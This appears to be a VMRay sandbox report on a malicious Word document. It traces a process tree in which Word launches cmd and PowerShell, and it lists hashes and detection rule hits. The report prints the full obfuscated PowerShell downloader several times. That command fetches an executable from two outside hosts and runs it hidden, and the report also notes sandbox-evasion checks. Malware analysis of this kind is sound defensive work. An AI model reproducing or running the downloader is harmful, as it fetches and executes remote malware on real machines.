VMRay Analyzer Report for Sample #19183 (VMRay Analyzer 2.2.0)

Network: URI www.events4u.cz resolved to address 93.185.102.11

Process tree (process number, PID and parent PID, command line, working directory, image path, recorded operation types):

Process 1: PID 2324 winword.exe (parent PID 1384)
  Command line: "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\program files\microsoft office\office15\winword.exe
  Operations: Created, Opened

Process 2: PID 2528 cmd.exe (parent PID 2324, child of Process 1)
  Command line: cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\windows\system32\cmd.exe
  Operations: Created, Opened

Process 3: PID 2552 powershell.exe (parent PID 2528, child of Process 2)
  Command line: PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'');Start-Process ''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat;Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat' -WindowStyle Hidden"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\windows\system32\windowspowershell\v1.0\powershell.exe
  Operations: Created, Read_From, Opened

Process 4: PID 2596 cmd.exe (parent PID 2552, child of Process 3)
  Command line: cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" "
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\windows\system32\cmd.exe
  Operations: Created, Read_From, Wrote_To, Opened

Process 5: PID 2624 powershell.exe (parent PID 2596, child of Process 4)
  Command line: PowerShell "function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe');Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')}
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\windows\system32\windowspowershell\v1.0\powershell.exe
  Operations: Created, Read_From, Opened, Connected_To

Process 6: PID 2840 mvmubw.exe (parent PID 2624, child of Process 5)
  Command line: "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe"
  Working directory: C:\Users\aDU0VK IWA5kLS\Desktop\
  Image path: c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe
  Operations: Created, Copied, Opened

Process 7: PID 2920 mvnucw.exe (parent PID 2840, child of Process 6)
  Command line: "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe"
  Working directory: C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\
  Image path: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe
  Operations: Created, Opened

Process 8: PID 2096 svchost.exe (parent PID 2920, child of Process 7)
  Command line: svchost.exe
  Working directory: C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\
  Image path: c:\windows\system32\svchost.exe
  Operations: Read_From, Created, Connected_To

Process 9: PID 692 taskeng.exe (parent PID 852)
  Command line: taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:LUA[1]
  Working directory: C:\Windows\system32\
  Image path: c:\windows\system32\taskeng.exe

Process 10: PID 2000 taskeng.exe (parent PID 852)
  Command line: taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:Highest[1]
  Working directory: C:\Windows\system32\
  Image path: c:\windows\system32\taskeng.exe

Process 11: PID 1480 taskeng.exe (parent PID 852)
  Command line: taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\System:Service:
  Working directory: C:\Windows\system32\
  Image path: c:\windows\system32\taskeng.exe
#19183 Malware Artifacts 19183
Sample-ID: #19183
Job-ID: #9414
payload_comparison
This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system.
0 VTI Score based on VTI Database Version 2.6

Metadata of Sample File #19183
Submission-ID: #19318
C:\Users\aDU0VK IWA5kLS\Desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc doc
MD5 8c16de37cccc9788384adb61c118ba2c
SHA1 c54b16bd6a507bbbb832c4c62b894f426acecf31
SHA256 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca
Opened_By

Metadata of Analysis for Job-ID #9414
Timeout False x86 64-bit win7_64_sp1-mso2013 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 147.664
This is a property collection for additional information of VMRay analysis

VMRay Analyzer VTI rule matches
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"". (Create process)
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". (Create process)
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat". (Create process)
[Process] VTI rule match, score 1/5, vmray_install_ipc_endpoint: Create mutex with name "Global\.net clr networking". (Create system object)
[Network] VTI rule match, score 3/5, vmray_request_dns_by_name: Resolve host name "www.events4u.cz". (Perform DNS request)
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe". (Create process)
[Anti Analysis] VTI rule match, score 5/5, vmray_detect_application_sandbox_by_dll: Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll". (Try to detect application sandbox)
[Anti Analysis] VTI rule match, score 5/5, vmray_detect_application_sandbox_by_dll: Possibly trying to detect "Threatexpert" by checking for existence of module "dbghelp.dll". (Try to detect application sandbox)
[Anti Analysis] VTI rule match, score 5/5, vmray_detect_forensic_tool_by_module: Check the existence of DLL "SunBelt Sandbox". (Try to detect forensic tool)
[Anti Analysis] VTI rule match, score 5/5, vmray_detect_forensic_tool_by_module: Check the existence of DLL "Winsock Packet Editor". (Try to detect forensic tool)
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe". (Create process)
[Process] VTI rule match, score 4/5, vmray_document_create_process: Create process "svchost.exe". (Create process)
[Process] VTI rule match, score 4/5, vmray_read_from_remote_process: "c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" reads from "svchost.exe". (Read from memory of another process)
[Process] VTI rule match, score 1/5, vmray_install_ipc_endpoint: Create mutex with name "Global\VLock". (Create system object)
